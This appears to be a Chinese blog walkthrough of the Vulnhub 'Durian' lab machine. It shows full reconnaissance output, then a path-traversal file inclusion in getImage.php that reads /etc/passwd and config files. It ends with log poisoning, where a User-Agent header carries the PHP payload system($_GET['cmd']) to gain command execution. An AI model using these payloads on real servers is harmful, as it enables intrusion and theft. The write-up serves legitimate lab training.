本文最后更新于0 天前,其中的信息可能已经过时,如有错误请发送邮件到big_fw@foxmail.com
前言
想说的话
打这台靶机大概花了我两天的时间,遇到了很多意料之外的麻烦,甚至一度让我放弃,但最终还是啃了下来,现在把一些经验分享给大家。
在打这台靶机的过程中,下面几位师傅的文章给了我很大的帮助。
https://www.hackingarticles.in/durian-1-vulnhub-walkthrough/
https://www.hacknos.com/durian-vulnhub-walkthrough/
https://github.com/Meowmycks/OSCPprep-Durian
攻击路径
信息收集
初步收集
进行主机发现
┌──(kali㉿kali)-[~]
└─$ nmap -sn 10.10.10.0/24
Starting Nmap 7.95 ( https://nmap.org ) at 2026-01-22 20:46 EST
Nmap scan report for 10.10.10.1
Host is up (0.00066s latency).
MAC Address: 00:50:56:C0:00:08 (VMware)
Nmap scan report for 10.10.10.2
Host is up (0.00012s latency).
MAC Address: 00:50:56:EB:65:BE (VMware)
Nmap scan report for 10.10.10.24
Host is up (0.00026s latency).
MAC Address: 00:0C:29:67:34:BF (VMware)
Nmap scan report for 10.10.10.254
Host is up (0.00013s latency).
MAC Address: 00:50:56:F9:92:85 (VMware)
Nmap scan report for 10.10.10.128
Host is up.
Nmap done: 256 IP addresses (5 hosts up) scanned in 2.06 seconds 新靶机的ip为10.10.10.24
对他进行端口扫描,udp端口扫描和默认脚本扫描
端口扫描:
┌──(kali㉿kali)-[~]
└─$ nmap -p- 10.10.10.24 --min-rate 1000
Starting Nmap 7.95 ( https://nmap.org ) at 2026-01-22 20:52 EST
Nmap scan report for 10.10.10.24
Host is up (0.00066s latency).
Not shown: 65531 closed tcp ports (reset)
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
7080/tcp open empowerid
8088/tcp open radan-http
MAC Address: 00:0C:29:67:34:BF (VMware)
Nmap done: 1 IP address (1 host up) scanned in 2.74 seconds udp扫描
┌──(kali㉿kali)-[~]
└─$ nmap -sU --top-ports 100 10.10.10.24 --min-rate 1000
Starting Nmap 7.95 ( https://nmap.org ) at 2026-01-22 20:53 EST
Nmap scan report for 10.10.10.24
Host is up (0.00030s latency).
Not shown: 96 open|filtered udp ports (no-response)
PORT STATE SERVICE
9/udp closed discard
1813/udp closed radacct
5353/udp closed zeroconf
32769/udp closed filenet-rpc
MAC Address: 00:0C:29:67:34:BF (VMware)
Nmap done: 1 IP address (1 host up) scanned in 0.47 seconds默认脚本扫描:
┌──(kali㉿kali)-[~]
└─$ nmap --script=vuln 10.10.10.24 --min-rate 1000
Starting Nmap 7.95 ( https://nmap.org ) at 2026-01-22 20:52 EST
Nmap scan report for 10.10.10.24
Host is up (0.00033s latency).
Not shown: 997 closed tcp ports (reset)
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
|_http-dombased-xss: Couldn't find any DOM based XSS.
|_http-csrf: Couldn't find any CSRF vulnerabilities.
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
| http-enum:
| /blog/: Blog
|_ /blog/wp-login.php: WordPress login page.
8088/tcp open radan-http
MAC Address: 00:0C:29:67:34:BF (VMware)
Nmap done: 1 IP address (1 host up) scanned in 329.57 seconds进一步的详细信息扫描与指纹识别
┌──(kali㉿kali)-[~/Vulnhub/Durian]
└─$ nmap -sV -sC -sT -O -p 22,80,7080,8088 10.10.10.24 --min-rate 1000
Starting Nmap 7.95 ( https://nmap.org ) at 2026-01-25 21:59 EST
Nmap scan report for 10.10.10.24
Host is up (0.00071s latency).
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey:
| 2048 28:1c:64:fa:9c:c3:d2:d4:bb:76:3d:3b:10:e2:b1:25 (RSA)
| 256 da:b2:e1:7f:7c:1b:58:cf:fd:4f:74:e9:23:6d:51:d7 (ECDSA)
|_ 256 41:e1:0c:2b:d4:26:e8:d3:71:bb:9d:f9:61:56:63:c0 (ED25519)
80/tcp open http Apache httpd 2.4.38 ((Debian))
|_http-title: Durian
|_http-server-header: Apache/2.4.38 (Debian)
7080/tcp open ssl/empowerid LiteSpeed
|_http-server-header: LiteSpeed
| tls-alpn:
| h2
| spdy/3
| spdy/2
|_ http/1.1
|_ssl-date: TLS randomness does not represent time
| http-title: LiteSpeed WebAdmin Console
|_Requested resource was https://10.10.10.24:7080/login.php
| fingerprint-strings:
| GetRequest:
| HTTP/1.0 302 Found
| GetRequest: 22:01:37 [120/905]
| HTTP/1.0 302 Found
| x-powered-by: PHP/5.6.36
| x-frame-options: SAMEORIGIN
| x-xss-protection: 1;mode=block
| referrer-policy: same-origin
| x-content-type-options: nosniff
| set-cookie: LSUI37FE0C43B84483E0=50dedeb0254050877e777fcd607a6ef5; path=/; secure; HttpOnly
| expires: Thu, 19 Nov 1981 08:52:00 GMT
| cache-control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
| pragma: no-cache
| set-cookie: LSID37FE0C43B84483E0=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/
| set-cookie: LSPA37FE0C43B84483E0=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/
| set-cookie: LSUI37FE0C43B84483E0=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/
| location: /login.php
| content-type: text/html; charset=UTF-8
| content-length: 0
| date: Sun, 25 Jan 2026 16:05:09 GMT
| server: LiteSpeed
| alt-svc: quic=":7080"; ma=2592000; v="43,46", h3-Q043=":7080";
| HTTPOptions:
| HTTP/1.0 302 Found
| x-powered-by: PHP/5.6.36
| x-frame-options: SAMEORIGIN
| x-xss-protection: 1;mode=block
| referrer-policy: same-origin
| x-content-type-options: nosniff
| set-cookie: LSUI37FE0C43B84483E0=5a211f21e65eeaee59307faf7b8dd9a4; path=/; secure; HttpOnly
| expires: Thu, 19 Nov 1981 08:52:00 GMT
| cache-control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
| pragma: no-cache
| set-cookie: LSID37FE0C43B84483E0=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/
| set-cookie: LSPA37FE0C43B84483E0=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/
| set-cookie: LSUI37FE0C43B84483E0=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/
| location: /login.php
| content-type: text/html; charset=UTF-8
| content-length: 0
| date: Sun, 25 Jan 2026 16:05:09 GMT
| server: LiteSpeed
|_ alt-svc: quic=":7080"; ma=2592000; v="43,46", h3-Q043=":7080";
| ssl-cert: Subject: commonName=durian/organizationName=LiteSpeedCommunity/stateOrProvinceName=NJ/countryName=US
| Not valid before: 2020-09-08T02:05:32
|_Not valid after: 2022-12-07T02:05:32
8088/tcp open radan-http LiteSpeed
|_http-title: Durian
| fingerprint-strings:
| GetRequest:
| HTTP/1.0 200 OK
| etag: "2fd-5f56ea13-40590;;;"
| last-modified: Tue, 08 Sep 2020 02:18:59 GMT
| content-type: text/html
| content-length: 765
| accept-ranges: bytes
| date: Sun, 25 Jan 2026 16:04:53 GMT
| server: LiteSpeed
| connection: close
| <html>
| <body bgcolor="white">
| <head>
| <title>Durian</title>
| <meta name="description" content="We Are Still Alive!">
| <meta name="keywords" content="Hacked by Ind_C0d3r">
| <meta name="description" content="We Are Still Alive!"> 22:01:37 [60/905]
| <meta name="keywords" content="Hacked by Ind_C0d3r">
| <meta name="robots" content="index, follow">
| <meta http-equiv="Content-Type" content="text/html; charset=utf-8">
| <meta name="language" content="English">
| </head>
| <link href="https://fonts.googleapis.com/css?family=Righteous|Saira+Stencil+One&display=swap" rel="stylesheet">
| <style type="text/css">
| @font-face {
| font-family: 'Righteous', cursive;
| font-family: 'Saira Stencil One', cursive;
| </style>
| <center><br><br>
| <img src="https://www.producemarketguide.com/sites/default/files/Commoditi
| Socks5:
| HTTP/1.1 400 Bad Request
| content-type: text/html
| cache-control: private, no-cache, max-age=0
| pragma: no-cache
| content-length: 1209
| date: Sun, 25 Jan 2026 16:04:53 GMT
| server: LiteSpeed
| connection: close
| <!DOCTYPE html>
| <html style="height:100%">
| <head>
| <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no">
| <title> 400 Bad Request
| </title></head>
| <body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;">
| <div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;">
| style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">400</h1>
| style="margin-top:20px;font-size: 30px;">Bad Request
| </h2>
| <p>It is not a valid request!</p>
|_ </div></div><div style="color:#f0f0
|_http-server-header: LiteSpeed
2 services unrecognized despite returning data. If you know the service/version, please submit the following fingerprints at https://nmap.org/cgi-bin/submit.cgi?new-service :
==============NEXT SERVICE FINGERPRINT (SUBMIT INDIVIDUALLY)==============
SF-Port7080-TCP:V=7.95%T=SSL%I=7%D=1/25%Time=6976D8B9%P=x86_64-pc-linux-gn
SF:u%r(GetRequest,430,"HTTP/1\.0\x20302\x20Found\r\nx-powered-by:\x20PHP/5
SF:\.6\.36\r\nx-frame-options:\x20SAMEORIGIN\r\nx-xss-protection:\x201;mod
SF:e=block\r\nreferrer-policy:\x20same-origin\r\nx-content-type-options:\x
SF:20nosniff\r\nset-cookie:\x20LSUI37FE0C43B84483E0=50dedeb0254050877e777f
SF:cd607a6ef5;\x20path=/;\x20secure;\x20HttpOnly\r\nexpires:\x20Thu,\x2019
SF:\x20Nov\x201981\x2008:52:00\x20GMT\r\ncache-control:\x20no-store,\x20no
SF:-cache,\x20must-revalidate,\x20post-check=0,\x20pre-check=0\r\npragma:\
SF:x20no-cache\r\nset-cookie:\x20LSID37FE0C43B84483E0=deleted;\x20expires=
SF:Thu,\x2001-Jan-1970\x2000:00:01\x20GMT;\x20Max-Age=0;\x20path=/\r\nset-
SF:cookie:\x20LSPA37FE0C43B84483E0=deleted;\x20expires=Thu,\x2001-Jan-1970
SF:\x2000:00:01\x20GMT;\x20Max-Age=0;\x20path=/\r\nset-cookie:\x20LSUI37FE
SF:0C43B84483E0=deleted;\x20expires=Thu,\x2001-Jan-1970\x2000:00:01\x20GMT
SF:;\x20Max-Age=0;\x20path=/\r\nlocation:\x20/login\.php\r\ncontent-type:\
SF:x20text/html;\x20charset=UTF-8\r\ncontent-length:\x200\r\ndate:\x20Sun,
SF:\x2025\x20Jan\x202026\x2016:05:09\x20GMT\r\nserver:\x20LiteSpeed\r\nalt
SF:-svc:\x20quic=\":7080\";\x20ma=2592000;\x20v=\"43,46\",\x20h3-Q043=\":7
SF:080\";\x20")%r(HTTPOptions,430,"HTTP/1\.0\x20302\x20Found\r\nx-powered-
SF:by:\x20PHP/5\.6\.36\r\nx-frame-options:\x20SAMEORIGIN\r\nx-xss-protecti
SF:on:\x201;mode=block\r\nreferrer-policy:\x20same-origin\r\nx-content-typ
SF:e-options:\x20nosniff\r\nset-cookie:\x20LSUI37FE0C43B84483E0=5a211f21e6
SF:5eeaee59307faf7b8dd9a4;\x20path=/;\x20secure;\x20HttpOnly\r\nexpires:\x
SF:20Thu,\x2019\x20Nov\x201981\x2008:52:00\x20GMT\r\ncache-control:\x20no-
SF:5eeaee59307faf7b8dd9a4;\x20path=/;\x20secure;\x20HttpOnly\r\nexpires:\x 22:01:37 [0/905]
SF:20Thu,\x2019\x20Nov\x201981\x2008:52:00\x20GMT\r\ncache-control:\x20no-
SF:store,\x20no-cache,\x20must-revalidate,\x20post-check=0,\x20pre-check=0
SF:\r\npragma:\x20no-cache\r\nset-cookie:\x20LSID37FE0C43B84483E0=deleted;
SF:\x20expires=Thu,\x2001-Jan-1970\x2000:00:01\x20GMT;\x20Max-Age=0;\x20pa
SF:th=/\r\nset-cookie:\x20LSPA37FE0C43B84483E0=deleted;\x20expires=Thu,\x2
SF:001-Jan-1970\x2000:00:01\x20GMT;\x20Max-Age=0;\x20path=/\r\nset-cookie:
SF:\x20LSUI37FE0C43B84483E0=deleted;\x20expires=Thu,\x2001-Jan-1970\x2000:
SF:00:01\x20GMT;\x20Max-Age=0;\x20path=/\r\nlocation:\x20/login\.php\r\nco
SF:ntent-type:\x20text/html;\x20charset=UTF-8\r\ncontent-length:\x200\r\nd
SF:ate:\x20Sun,\x2025\x20Jan\x202026\x2016:05:09\x20GMT\r\nserver:\x20Lite
SF:Speed\r\nalt-svc:\x20quic=\":7080\";\x20ma=2592000;\x20v=\"43,46\",\x20
SF:h3-Q043=\":7080\";\x20");
==============NEXT SERVICE FINGERPRINT (SUBMIT INDIVIDUALLY)==============
SF-Port8088-TCP:V=7.95%I=7%D=1/25%Time=6976D8A9%P=x86_64-pc-linux-gnu%r(Ge
SF:tRequest,3EC,"HTTP/1\.0\x20200\x20OK\r\netag:\x20\"2fd-5f56ea13-40590;;
SF:;\"\r\nlast-modified:\x20Tue,\x2008\x20Sep\x202020\x2002:18:59\x20GMT\r
SF:\ncontent-type:\x20text/html\r\ncontent-length:\x20765\r\naccept-ranges
SF::\x20bytes\r\ndate:\x20Sun,\x2025\x20Jan\x202026\x2016:04:53\x20GMT\r\n
SF:server:\x20LiteSpeed\r\nconnection:\x20close\r\n\r\n<html>\n<body\x20bg
SF:color=\"white\">\n<head>\n<title>Durian</title>\n<meta\x20name=\"descri
SF:ption\"\x20content=\"We\x20Are\x20Still\x20Alive!\">\n<meta\x20name=\"k
SF:eywords\"\x20content=\"Hacked\x20by\x20Ind_C0d3r\">\n<meta\x20name=\"ro
SF:bots\"\x20content=\"index,\x20follow\">\n<meta\x20http-equiv=\"Content-
SF:Type\"\x20content=\"text/html;\x20charset=utf-8\">\n<meta\x20name=\"lan
SF:guage\"\x20content=\"English\">\n</head>\n<link\x20href=\"https://fonts
SF:\.googleapis\.com/css\?family=Righteous\|Saira\+Stencil\+One&display=sw
SF:ap\"\x20rel=\"stylesheet\">\n<style\x20type=\"text/css\">\n@font-face\x
SF:20{\n\tfont-family:\x20'Righteous',\x20cursive;\n\tfont-family:\x20'Sai
SF:ra\x20Stencil\x20One',\x20cursive;\n}\n</style>\n<center><br><br>\n<img
SF:\x20src=\"https://www\.producemarketguide\.com/sites/default/files/Comm
SF:oditi")%r(Socks5,58E,"HTTP/1\.1\x20400\x20Bad\x20Request\r\ncontent-typ
SF:e:\x20text/html\r\ncache-control:\x20private,\x20no-cache,\x20max-age=0
SF:\r\npragma:\x20no-cache\r\ncontent-length:\x201209\r\ndate:\x20Sun,\x20
SF:25\x20Jan\x202026\x2016:04:53\x20GMT\r\nserver:\x20LiteSpeed\r\nconnect
SF:ion:\x20close\r\n\r\n<!DOCTYPE\x20html>\n<html\x20style=\"height:100%\"
SF:>\n<head>\n<meta\x20name=\"viewport\"\x20content=\"width=device-width,\
SF:x20initial-scale=1,\x20shrink-to-fit=no\">\n<title>\x20400\x20Bad\x20Re
SF:quest\r\n</title></head>\n<body\x20style=\"color:\x20#444;\x20margin:0;
SF:font:\x20normal\x2014px/20px\x20Arial,\x20Helvetica,\x20sans-serif;\x20
SF:height:100%;\x20background-color:\x20#fff;\">\n<div\x20style=\"height:a
SF:uto;\x20min-height:100%;\x20\">\x20\x20\x20\x20\x20<div\x20style=\"text
SF:-align:\x20center;\x20width:800px;\x20margin-left:\x20-400px;\x20positi
SF:on:absolute;\x20top:\x2030%;\x20left:50%;\">\n\x20\x20\x20\x20\x20\x20\
SF:x20\x20<h1\x20style=\"margin:0;\x20font-size:150px;\x20line-height:150p
SF:x;\x20font-weight:bold;\">400</h1>\n<h2\x20style=\"margin-top:20px;font
SF:-size:\x2030px;\">Bad\x20Request\r\n</h2>\n<p>It\x20is\x20not\x20a\x20v
SF:alid\x20request!</p>\n</div></div><div\x20style=\"color:#f0f0");
MAC Address: 00:0C:29:67:34:BF (VMware)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose|router
Running: Linux 4.X|5.X, MikroTik RouterOS 7.X
OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5 cpe:/o:mikrotik:routeros:7 cpe:/o:linux:linux_kernel:5.6.3
OS details: Linux 4.15 - 5.19, OpenWrt 21.02 (Linux 5.4), MikroTik RouterOS 7.2 - 7.5 (Linux 5.6.3)
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 111.85 seconds可以看到开放了
22 –正常的ssh服务
80 –经典http服务
7080– 加密认证,身份管理服务,类似统一身份认证
8088 –random http 具体服务不清楚,可能是用于代理
这里有一点是这台靶机的http服务是随机开在80与8000端口上的
开始进一步探测
对80,8088两个端口进行目录扫描
80端口的扫描结果
┌──(kali㉿kali)-[~]
└─$ gobuster dir -u http://10.10.10.24:80 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
===============================================================
Gobuster v3.8
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://10.10.10.24:80
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.8
[+] Timeout: 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/blog (Status: 301) [Size: 309] [--> http://10.10.10.24/blog/]
/server-status (Status: 403) [Size: 276]
/cgi-data (Status: 301) [Size: 313] [--> http://10.10.10.24/cgi-data/]
Progress: 220558 / 220558 (100.00%)
===============================================================
Finished
===============================================================8088端口的扫描结果
gobuster dir -u http://10.10.10.24:8088 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
===============================================================
Gobuster v3.8
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://10.10.10.24:8088
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.8
[+] Timeout: 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/img (Status: 301) [Size: 1260] [--> http://10.10.10.24:8088/img/]
/cgi-bin (Status: 301) [Size: 1260] [--> http://10.10.10.24:8088/cgi-bin/]
/docs (Status: 301) [Size: 1260] [--> http://10.10.10.24:8088/docs/]
/css (Status: 301) [Size: 1260] [--> http://10.10.10.24:8088/css/]
/protected (Status: 301) [Size: 1260] [--> http://10.10.10.24:8088/protected/]
/blocked (Status: 301) [Size: 1260] [--> http://10.10.10.24:8088/blocked/]
Progress: 220558 / 220558 (100.00%)
===============================================================
Finished
===============================================================可以看到所有路径的长度都一样的,可能是有某种限制了访问,尝试访问
同时也对7080进行扫描,试图找出没有严格重定向到身份验证页面的路径
┌──(kali㉿kali)-[~]
└─$ gobuster dir -u http://10.10.10.24:7080 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
===============================================================
Gobuster v3.8
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://10.10.10.24:7080
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.8
[+] Timeout: 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
Progress: 0 / 1 (0.00%)
2026/01/22 22:16:50 the server returns a status code that matches the provided options for non existing urls. http://10.10.10.24:7080/39187153-9521-4115-8d9d-285ba3c757ad => 301 (redirect to https://10.10.10.24:7080/39187153-9521-4115-8d9d-285ba3c757ad) (Length: 0). Please exclude the response length or the status code or set the wildcard option.. To continue please exclude the status code or the length被拒绝了
先看先前默认脚本扫描出的/blog和/blog/wp-login.php页面
/blog页面
没什么有用信息/blog/wp-login.php 页面`
有一个登入框,尝试SQL注入无果
看看8088端口的docs文件
应该是运行的身份认证服务
在kali上搜索该服务的历史漏洞
┌──(kali㉿kali)-[~/Vulnhub/Durian]
└─$ searchsploit OpenLiteSpeed 1.7
------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
Exploit Title | Path
Openlitespeed 1.7.9 - 'Notes' Stored Cross-Site Scripting | multiple/webapps/49727.txt
Openlitespeed Web Server 1.7.8 - Command Injection (Authenticated) (1) | multiple/webapps/49483.txt
Openlitespeed WebServer 1.7.8 - Command Injection (Authenticated) (2) | multiple/webapps/49556.py
------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
Shellcodes: No Results有命令注入漏洞,但是需要凭证,也就是需要登入
在/protect目录下弹出了一个登入框
尝试输入 test/test测试
没什么反应
尝试去访问/cgi-data目录
有一个 getImage.php 文件
尝试访问
页面样式
因为getImage的意思是获取图片,猜测可能要进行传参
进行攻击
用fuff去拼接参数
┌──(kali㉿kali)-[~]
└─$ ffuf -w /usr/share/mywordlists/parameter.txt -u http://10.10.10.24/cgi-data/getImage.php?FUZZ=../../../../../etc/passwd -fs 241
/'___\ /'___\ /'___\
/\ \__/ /\ \__/ __ __ /\ \__/
\ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\
\ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/
\ \_\ \ \_\ \ \____/ \ \_\
\/_/ \/_/ \/___/ \/_/
v2.1.0-dev
________________________________________________
:: Method : GET
:: URL : http://10.10.10.24/cgi-data/getImage.php?FUZZ=../../../../../etc/passwd
:: Wordlist : FUZZ: /usr/share/mywordlists/parameter.txt
:: Follow redirects : false
:: Calibration : false
:: Timeout : 10
:: Threads : 40
:: Matcher : Response status: 200-299,301,302,307,401,403,405,500
:: Filter : Response size: 241
________________________________________________
file [Status: 200, Size: 1729, Words: 37, Lines: 43, Duration: 1ms]
:: Progress: [5848/5848] :: Job [1/1] :: 49 req/sec :: Duration: [0:00:05] :: Errors: 0 ::可以看到file参数有回显
打开这个链接,可以看到详细内容
尝试读一些shadow文件去判断www-data的权限高低然后去判断在后续有没有机会用shellshock提权(因为通过路径可以看到这是个cgi程序)
无法访问
到这里我们就有了一个ELF本地文件包含漏洞,但是要从中拿到立足点还是有些难度。
于是我打算对目录进行更进一步的扫描
文件上传的可能性尝试(目录扫描扩展名的优先级问题)
gobuster dir -u http://10.10.10.24:8088 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x .php,.txt,.sql,.tar,.rar,.zip
===============================================================
Gobuster v3.8
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://10.10.10.24:8088
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.8
[+] Extensions: sql,tar,rar,zip,php,txt
[+] Timeout: 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/cgi-bin (Status: 301) [Size: 1260] [--> http://10.10.10.24:8088/cgi-bin/]
/img (Status: 301) [Size: 1260] [--> http://10.10.10.24:8088/img/]
/docs (Status: 301) [Size: 1260] [--> http://10.10.10.24:8088/docs/]
/upload.php (Status: 200) [Size: 1770]
/css (Status: 301) [Size: 1260] [--> http://10.10.10.24:8088/css/]
/protected (Status: 301) [Size: 1260] [--> http://10.10.10.24:8088/protected/]
/blocked (Status: 301) [Size: 1260] [--> http://10.10.10.24:8088/blocked/]
Progress: 1543906 / 1543906 (100.00%)
===============================================================
Finished
===============================================================尝试访问upload.php
没有任何的交互
从有 upload.php 这个文件来说,是可以推测这个服务器有文件上传的功能点的,如果将他与我们的LFI(本地文件包含)漏洞结合起来,是比较轻易的获取shell的。
服务器后缀名解析问题
这里我犯了一个巨大的失误,就是没有加上.html的后缀名导致错失了一条攻击路径
这里做一个补充,为什么我第一次扫描的时候,没有加上html的后缀,是因为我本来不知道我应该优先扫哪些后缀文件,有一次我看到红笔师傅扫的这6个,我就去模仿了,其实我不知道其中的原因,所以导致了这次失误,后续我研究了一下html后缀文件和php文件的优先级,大概是这样的
对于没有添加后缀的文件名受限会排查目录
具体取决于中间件的设置
Apache中间件和Nginx会去调用不同的配置文件去决定默认的解析方式
例如:
Apache 示例配置 (.htaccess 或 httpd.conf)
DirectoryIndex index.php index.html
Apache默认的初始设置会先寻找.php后缀的文件,再去寻找.html后缀的文件
所以这导致了我错过了这个文件上传功能点,当时的那位师傅打的靶机可能是他的设置有改变,所以没有用html后缀去扫
所以说很多时候细节决定成败
在明白了这点后,我们补充上html后缀的扫描
gobuster dir -u http://10.10.10.24:8088 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x .html
===============================================================
Gobuster v3.8
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://10.10.10.24:8088
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.8
[+] Extensions: html
[+] Timeout: 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/index.html (Status: 200) [Size: 765]
/cgi-bin (Status: 301) [Size: 1260] [--> http://10.10.10.24:8088/cgi-bin/]
/img (Status: 301) [Size: 1260] [--> http://10.10.10.24:8088/img/]
/docs (Status: 301) [Size: 1260] [--> http://10.10.10.24:8088/docs/]
/upload.html (Status: 200) [Size: 6520]
/css (Status: 301) [Size: 1260] [--> http://10.10.10.24:8088/css/]
/protected (Status: 301) [Size: 1260] [--> http://10.10.10.24:8088/protected/]
/blocked (Status: 301) [Size: 1260] [--> http://10.10.10.24:8088/blocked/]
Progress: 441116 / 441116 (100.00%)
===============================================================
Finished
===============================================================访问upload.html
的确有文件上传功能,尝试上传一个shell
其中只允许jpg文件上传,但目前我们有本地文件包含,不用太担心解析问题
上传的路径为/tmp/phpOA0P3X
尝试访问触发反弹shell
不知什么原因,反弹失败了。
难道是在/tmp目录下没有执行权限吗?
到这里我有些一筹莫展了,我选择去看一下别人的writeup
LFI+日志投毒利用
大部分的writeup都提到了一个我没有接触过的名词,日志投毒,于是我去研究了一下这个技术。
这时候思路就继续在LFI延续下去,既然要日志投毒,我们得知道哪些日志能够访问和被当成代码解析
在 https://www.hackingarticles.in/durian-1-vulnhub-walkthrough/ 中提到了
用burp、 一本自定义的日志路径词典和“durian”(机器名称)跑了一整天才拿到了
/var/log/durian.log/access.log
这个路径,它由Apache的默认日志路径:/var/log/access.log和durian.log两部分拼接而成
但这个方式实在是有些笨,我们可以通过尝试访问Apache的配置文件去获取日志文件的位置
于是我尝试了
/etc/apache2/apache2.conf/etc/httpd/httpd.conf/etc/apache2/sites-available/000-default.conf
这三个配置文件,在前两条日志文件的路径被变量替换,最后一个配置文件我们成功拿到了日志文件所在的路径
位于/var/log/durian.log/access.log
并且我们还拿到了错误日志的路径位于
/var/log/durian.log/access.log
其中
https://github.com/Meowmycks/OSCPprep-Durian
提到了我们的7080端口的身份认证服务的默认日志路径没有改变,为
/usr/locallsws/logs/access.log
/usr/locallsws/logs/error.log
这些路径都可以进行尝试,我选择/var/log/durian.log/access.log去进行尝试日志投毒
于是我先查看了具体的日志内容
可以看到日志记录了user-agent的内容,用bp抓取请求包,并尝试在User-Agent头中进行投毒
这里我遇到了两个巨大的问题,困扰了我一段时间,当我在User-Agent中写入
`
时,服务器竟然返回了500错误,我们无法再通过access.log日志文件进行下一步操作了。
这让我十分困惑,于是我去比对了我的验证命令与其他writeup的区别,尝试去搞清楚这个问题形成的原因
经过对比发现
<?php system("id");?>
`
他们的验证命令是用的单引号
并且通过error.log文件中的报错
[Fri Jan 23 04:01:32.201202 2026] [php7:error] [pid 794] [client 10.10.10.128:38764] PHP Parse error: syntax error, unexpected '"id\\");?> AppleWebKit/537.36 (' (T_CONSTANT_ENCAPSED_STRING), expecting identifier (T_STRING) in /var/log/durian.log/access.log on line 5我意识到了是 ” (双引号)的解析问题,错误的闭合了原本的命令导致了语法错误
于是我当时重置一下靶机,使用了改进后的payload
这次日志成功执行了我注入的代码
成功返回了id命令执行的结果
于是我尝试注入Get方法让其从url中获取参数,便于后续的测试
于是我输入payload
GET /cgi-data/getImage.php?file=/var/log/durian.log/access.log&cmd=id HTTP/1.1
Host: 10.10.10.24
Cache-Control: max-age=0
Accept-Language: en-US,en;q=0.9
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (X11; Linux x86_64) <?php system($_GET['cmd']);?> AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Connection: keep-alive这次又报错了,显示
PHP Notice: Undefined variable: daemon in /var/www/html/test.php on line 184显示未定义的参数,我又觉得很奇怪,怎么会没有定义参数呢,我的cmd明明已经注入进去了呀。于是我又去查资料。
在我了解日志投毒的流程之后,我明白了报错的原因,日志投毒需要先注入命令再用url进行传参,获取参数是再文件包含时解析php代码执行的,这时才会获取参数,也就是说每一次读取日志都是先解析再写入,我们在第一次解析的时候还并没有写入我们的代码,这时cmd参数就无处可去报错了,要分步进行。
在明白这个道理之后,我再次进行尝试。
可以看到运行成功了
现在我们就获得了一个LFI+日志投毒的RCE(远程命令执行)
于是我尝试直接执行反弹shell
发现返回400状态码,我有些奇怪,于是我又去查看了先前两位师傅的writeup,在其中一位师傅的writeup中写道
其中两个writeup都提到没有办法通过直接执行的反弹shell来获取立足点,于是我猜测,可能www-data做了什么限制?没有办法执行bash命令?但果真如此么,其实这里我犯了一个巨大的错误,但目前先按下不表。
